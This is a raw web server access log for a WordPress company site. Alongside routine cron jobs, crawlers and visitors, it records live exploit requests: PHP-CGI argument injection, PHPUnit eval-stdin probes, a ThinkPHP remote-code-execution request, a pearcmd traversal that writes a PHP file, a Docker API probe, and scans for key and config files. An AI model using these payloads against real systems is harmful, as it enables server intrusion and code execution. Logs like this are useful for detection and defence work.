36.133.108.121 - - [25/Jun/2026:11:17:20 +0800] "HEAD /wp-content/upgrade/cp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10"
106.8.136.64 - - [25/Jun/2026:11:19:11 +0800] "GET /company-news HTTP/1.1" 200 26293 "-" "YisouSpider"
36.133.115.36 - - [25/Jun/2026:11:20:25 +0800] "POST /wp-cron.php?doing_wp_cron=1782357625.1025159358978271484375 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.119 - - [25/Jun/2026:11:20:25 +0800] "HEAD /otrs/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
36.133.115.36 - - [25/Jun/2026:11:26:28 +0800] "POST /wp-cron.php?doing_wp_cron=1782357988.7861320972442626953125 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.119 - - [25/Jun/2026:11:26:28 +0800] "HEAD /wp-includes/assets/install_ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36"
36.133.115.36 - - [25/Jun/2026:11:27:32 +0800] "POST /wp-cron.php?doing_wp_cron=1782358052.4850730895996093750000 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.119 - - [25/Jun/2026:11:27:32 +0800] "HEAD /wp-admin/includes/forgot HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36"
36.133.115.36 - - [25/Jun/2026:11:30:39 +0800] "POST /wp-cron.php?doing_wp_cron=1782358239.6368460655212402343750 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
172.237.114.53 - - [25/Jun/2026:11:30:39 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
172.237.114.53 - - [25/Jun/2026:11:30:41 +0800] "GET / HTTP/1.1" 200 171975 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
36.133.115.36 - - [25/Jun/2026:11:34:40 +0800] "POST /wp-cron.php?doing_wp_cron=1782358480.6846759319305419921875 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
35.241.250.209 - - [25/Jun/2026:11:34:40 +0800] "GET / HTTP/1.1" 200 35183 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
36.133.115.36 - - [25/Jun/2026:11:38:08 +0800] "POST /wp-cron.php?doing_wp_cron=1782358688.2118170261383056640625 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.119 - - [25/Jun/2026:11:38:08 +0800] "HEAD /invoker/JMXInvokerServlet HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/24.0.1292.0 Safari/537.14"
36.133.108.119 - - [25/Jun/2026:11:41:06 +0800] "HEAD /wp-includes/assets/soap.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
36.133.115.36 - - [25/Jun/2026:11:41:54 +0800] "POST /wp-cron.php?doing_wp_cron=1782358914.3524870872497558593750 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.121 - - [25/Jun/2026:11:41:54 +0800] "HEAD /wp-includes/assets/secured HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
36.133.115.36 - - [25/Jun/2026:11:44:12 +0800] "POST /wp-cron.php?doing_wp_cron=1782359052.0165948867797851562500 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
103.69.85.19 - - [25/Jun/2026:11:44:12 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 32862 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:13 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 158049 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:13 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:13 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:13 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:13 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:14 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:14 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:14 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:14 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:14 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:14 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:14 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:14 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:14 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:14 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:14 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:14 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:15 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:15 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:15 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:15 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:15 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:15 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:15 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:15 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:15 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:15 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:15 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:16 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:16 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:16 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:16 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:16 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:16 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:16 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:16 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:16 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:16 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:17 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 67271 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:18 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:19 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 158049 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:21 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 158049 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:22 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
103.69.85.19 - - [25/Jun/2026:11:44:23 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
36.133.115.36 - - [25/Jun/2026:11:46:00 +0800] "POST /wp-cron.php?doing_wp_cron=1782359160.2089340686798095703125 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.121 - - [25/Jun/2026:11:46:00 +0800] "HEAD /wp-content/base HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36"
36.133.115.36 - - [25/Jun/2026:11:50:17 +0800] "POST /wp-cron.php?doing_wp_cron=1782359417.0155360698699951171875 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
47.253.2.91 - - [25/Jun/2026:11:50:17 +0800] "GET / HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
47.253.2.91 - - [25/Jun/2026:11:50:17 +0800] "GET / HTTP/1.1" 200 41074 "http://36.133.115.36" "Go-http-client/1.1"
36.133.115.36 - - [25/Jun/2026:11:52:25 +0800] "POST /wp-cron.php?doing_wp_cron=1782359545.5872368812561035156250 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.119 - - [25/Jun/2026:11:52:25 +0800] "HEAD /wp-admin/includes/db1.mdb HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
36.133.115.36 - - [25/Jun/2026:11:55:10 +0800] "POST /wp-cron.php?doing_wp_cron=1782359710.0689160823822021484375 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.119 - - [25/Jun/2026:11:55:10 +0800] "HEAD /v2/swagger.yaml HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
36.133.108.119 - - [25/Jun/2026:11:55:15 +0800] "HEAD /wp-admin/js/uri HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
36.133.108.119 - - [25/Jun/2026:11:55:20 +0800] "HEAD /wp-content/fonts/id_dsa.ppk HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36"
36.133.108.119 - - [25/Jun/2026:11:55:34 +0800] "HEAD /wp-admin/oauth HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
36.133.115.36 - - [25/Jun/2026:11:57:23 +0800] "POST /wp-cron.php?doing_wp_cron=1782359843.3085229396820068359375 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.121 - - [25/Jun/2026:11:57:23 +0800] "HEAD /wp-content/file HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"
36.133.115.36 - - [25/Jun/2026:12:04:46 +0800] "POST /wp-cron.php?doing_wp_cron=1782360286.6494550704956054687500 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.121 - - [25/Jun/2026:12:04:46 +0800] "HEAD /wp-includes/fonts/._env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0"
36.133.115.36 - - [25/Jun/2026:12:19:40 +0800] "POST /wp-cron.php?doing_wp_cron=1782361180.7435379028320312500000 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.125 - - [25/Jun/2026:12:19:40 +0800] "HEAD /files HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0"
36.133.115.36 - - [25/Jun/2026:12:29:04 +0800] "POST /wp-cron.php?doing_wp_cron=1782361743.9929618835449218750000 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.119 - - [25/Jun/2026:12:29:04 +0800] "HEAD /genericons HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
36.133.115.36 - - [25/Jun/2026:12:37:23 +0800] "POST /wp-cron.php?doing_wp_cron=1782362243.3729779720306396484375 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
43.165.125.66 - - [25/Jun/2026:12:37:23 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.165.125.66 - - [25/Jun/2026:12:37:26 +0800] "GET / HTTP/1.1" 200 35184 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.108.119 - - [25/Jun/2026:12:37:33 +0800] "HEAD /wp-includes/build/testing HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36"
36.133.108.121 - - [25/Jun/2026:12:37:45 +0800] "HEAD /wp-includes/js/updates HTTP/1.1" 404 0 "-" "Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10"
36.133.115.36 - - [25/Jun/2026:12:38:32 +0800] "POST /wp-cron.php?doing_wp_cron=1782362312.2262759208679199218750 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.125 - - [25/Jun/2026:12:38:32 +0800] "HEAD /2354/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0"
36.133.115.36 - - [25/Jun/2026:12:42:11 +0800] "POST /wp-cron.php?doing_wp_cron=1782362531.8282821178436279296875 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
52.167.144.204 - - [25/Jun/2026:12:42:11 +0800] "GET /?s=2026 HTTP/1.1" 200 20154 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
116.179.32.142 - - [25/Jun/2026:12:51:40 +0800] "GET /services HTTP/1.1" 200 26713 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.36 - - [25/Jun/2026:12:51:54 +0800] "GET /wp-content/uploads/2025/12/1764853155-ISO2-214x300.webp HTTP/1.1" 200 12682 "http://cqqizhou.com/services" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [25/Jun/2026:12:52:43 +0800] "POST /wp-cron.php?doing_wp_cron=1782363163.6804540157318115234375 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
101.132.83.153 - - [25/Jun/2026:12:52:43 +0800] "GET / HTTP/1.0" 200 158027 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36"
157.148.43.145 - - [25/Jun/2026:12:55:53 +0800] "GET /news/2165 HTTP/1.1" 200 27588 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
36.133.115.36 - - [25/Jun/2026:12:56:02 +0800] "POST /wp-cron.php?doing_wp_cron=1782363362.1088929176330566406250 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
216.244.66.245 - - [25/Jun/2026:12:56:02 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
36.133.115.36 - - [25/Jun/2026:12:58:02 +0800] "POST /wp-cron.php?doing_wp_cron=1782363482.7786710262298583984375 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.121 - - [25/Jun/2026:12:58:02 +0800] "HEAD /wp-content/upgrade/site_admin HTTP/1.1" 404 0 "-" "Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10"
36.133.115.36 - - [25/Jun/2026:13:00:22 +0800] "POST /wp-cron.php?doing_wp_cron=1782363622.5445311069488525390625 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.125 - - [25/Jun/2026:13:00:22 +0800] "HEAD /wp-includes/fonts/%40 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0"
36.133.115.36 - - [25/Jun/2026:13:01:47 +0800] "POST /wp-cron.php?doing_wp_cron=1782363707.7422800064086914062500 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.125 - - [25/Jun/2026:13:01:47 +0800] "HEAD /wp-content/languages/phpMyAdmin HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36"
216.244.66.245 - - [25/Jun/2026:13:03:15 +0800] "GET /services/processing HTTP/1.1" 200 91582 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
132.243.238.14 - - [25/Jun/2026:13:04:56 +0800] "GET /wp-content/uploads/2025/07/1751826322-Services_images_W900px.webp HTTP/1.1" 200 87128 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
36.133.115.36 - - [25/Jun/2026:13:04:58 +0800] "POST /wp-cron.php?doing_wp_cron=1782363898.7410230636596679687500 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.119 - - [25/Jun/2026:13:04:58 +0800] "HEAD /api/v1.0/swagger.yaml HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
36.133.115.36 - - [25/Jun/2026:13:16:49 +0800] "POST /wp-cron.php?doing_wp_cron=1782364609.1821188926696777343750 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.121 - - [25/Jun/2026:13:16:49 +0800] "HEAD /wp-includes/fonts/downloads HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-us) AppleWebKit/534.16+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
36.133.115.36 - - [25/Jun/2026:13:17:20 +0800] "POST /wp-cron.php?doing_wp_cron=1782364640.8120839595794677734375 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
220.126.240.110 - - [25/Jun/2026:13:17:21 +0800] "GET / HTTP/1.0" 200 158027 "-" "curl/7.88.1"
36.133.115.36 - - [25/Jun/2026:13:19:05 +0800] "POST /wp-cron.php?doing_wp_cron=1782364745.4210219383239746093750 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.125 - - [25/Jun/2026:13:19:05 +0800] "HEAD /home HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
36.133.108.121 - - [25/Jun/2026:13:24:20 +0800] "HEAD /wp-includes/assets/configuration.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
36.133.115.36 - - [25/Jun/2026:13:24:30 +0800] "POST /wp-cron.php?doing_wp_cron=1782365070.8837430477142333984375 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.125 - - [25/Jun/2026:13:24:30 +0800] "HEAD /wp-content/uploads/wc.db HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; yie8)"
36.133.115.36 - - [25/Jun/2026:13:31:19 +0800] "POST /wp-cron.php?doing_wp_cron=1782365479.1863729953765869140625 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
183.67.13.218 - - [25/Jun/2026:13:31:19 +0800] "GET / HTTP/1.1" 200 35184 "-" "Mozilla/5.0 (Linux; Android 11; V2072A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.200 Mobile Safari/537.36 VivoBrowser/29.3.3.0"
36.133.115.36 - - [25/Jun/2026:13:40:12 +0800] "POST /wp-cron.php?doing_wp_cron=1782366012.5954959392547607421875 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.119 - - [25/Jun/2026:13:40:12 +0800] "HEAD /wp-content/upgrade/service.asmx HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
36.133.115.36 - - [25/Jun/2026:13:41:28 +0800] "POST /wp-cron.php?doing_wp_cron=1782366088.5130920410156250000000 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
216.244.66.245 - - [25/Jun/2026:13:41:28 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
36.133.115.36 - - [25/Jun/2026:13:46:27 +0800] "POST /wp-cron.php?doing_wp_cron=1782366387.4775729179382324218750 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
74.222.26.143 - - [25/Jun/2026:13:46:27 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4280.67 Safari/537.36 Edg/97.0.664.52"
74.222.26.143 - - [25/Jun/2026:13:46:29 +0800] "GET / HTTP/1.1" 200 41074 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4280.67 Safari/537.36 Edg/97.0.664.52"
36.133.115.36 - - [25/Jun/2026:13:48:06 +0800] "POST /wp-cron.php?doing_wp_cron=1782366486.3680300712585449218750 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
216.244.66.245 - - [25/Jun/2026:13:48:06 +0800] "GET /news/page/5 HTTP/1.1" 200 84302 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
36.133.115.36 - - [25/Jun/2026:13:52:03 +0800] "POST /wp-cron.php?doing_wp_cron=1782366723.4134879112243652343750 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
43.155.26.193 - - [25/Jun/2026:13:52:03 +0800] "GET / HTTP/1.1" 200 35184 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [25/Jun/2026:14:03:45 +0800] "POST /wp-cron.php?doing_wp_cron=1782367425.6265349388122558593750 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
36.133.108.119 - - [25/Jun/2026:14:03:45 +0800] "HEAD /wp-content/upgrade/cleanup.log HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/24.0.1292.0 Safari/537.14"
36.133.115.36 - - [25/Jun/2026:14:04:09 +0800] "POST /wp-cron.php?doing_wp_cron=1782367449.1039431095123291015625 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
